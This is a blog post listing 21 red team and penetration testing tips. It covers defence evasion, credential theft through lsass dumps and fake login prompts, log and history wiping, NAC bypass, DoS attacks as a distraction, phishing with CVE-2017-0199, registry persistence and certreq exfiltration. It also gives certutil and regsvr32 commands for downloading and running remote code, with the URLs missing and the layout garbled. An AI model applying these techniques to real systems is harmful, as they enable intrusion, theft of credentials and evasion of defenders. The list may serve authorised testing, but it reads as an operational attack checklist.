Just a list of red team/penetration testing tips. There are currently 21 tips:
- You can use high reputation redirectors like Google or AWS in c&c communications to bypass reputation based whitelists. @1ce7ea redteam
- Use cleanwipe for uninstalling Sep. It doesn't require Administrator privileges. @dimakoci_ redteam windows
- Scan all local network IP ranges(192.168,172.16,10.0) instead of the scope given. You can find the forgotten networks or hosts. @kayhankayihan pentest
- Use net user /dom instead of net user /domain. Second one may be being watch by endpoint solution. @vysecurity redteam pentest windows
- Use wmiexec instead of psexec. It makes less noise. redteam pentest windows
- If you need put a file on disk, use Alternate Data Streams. @Oddvarmoe redteam windows
- If you have low priv shell, use fake login prompt for credentials. @enigma0x3 redteam windows
- If you need plaintext credentials and you don't want to use mimikatz. Dump lsass and parse it in local. redteam windows
- Avoid wtmp logging with ssh -l username target -T. @pwnagelabs redteam linux
- Use kill -9 $$ for avoiding bash history on exit. @pwnagelabs redteam linux
- If you have a connection but NAC is blocking you. Listen to broadcasts and collect mac address. And use printer's macs for NAC bypass. redteam pentest
- Scan external network with Nessus, Netsparker etc. or make little DoS/DDoS attacks to hide real action from blue team. @corpuscallosum redteam
- Use ROPEMAKER method and CVE-2017-0199 for creating phishing mails. redteam
- You can download
any files with signed certutil.exe
like this:
certutil -urlcache -split -f redteam pentest windows - You can run your
dlls like this:
regsrv32 /s /u dll_name redteam pentest windows - You can run
scripts remotely with regsvr32.exe like this:
regsvr32 /s /n /u /i:scrobj.dll @subTee redteam pentest windows - Use smtp relay for internal phishing. redteam
- You can encrypt your payloads/macros with using target company domain name as key. redteam pentest windows
- You can use HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ with Debugger value for persistence. redteam windows
- You must tune connection limit when using automatic vulnerability scanners for avoiding network dropouts. @Kayranfatih pentest
- You can use Windows's certreq.exe for data exfiltration. @doylersec redteam windows
Source: http://synack.blog/posts/red-teaming-and...index.html
0 comments:
Post a Comment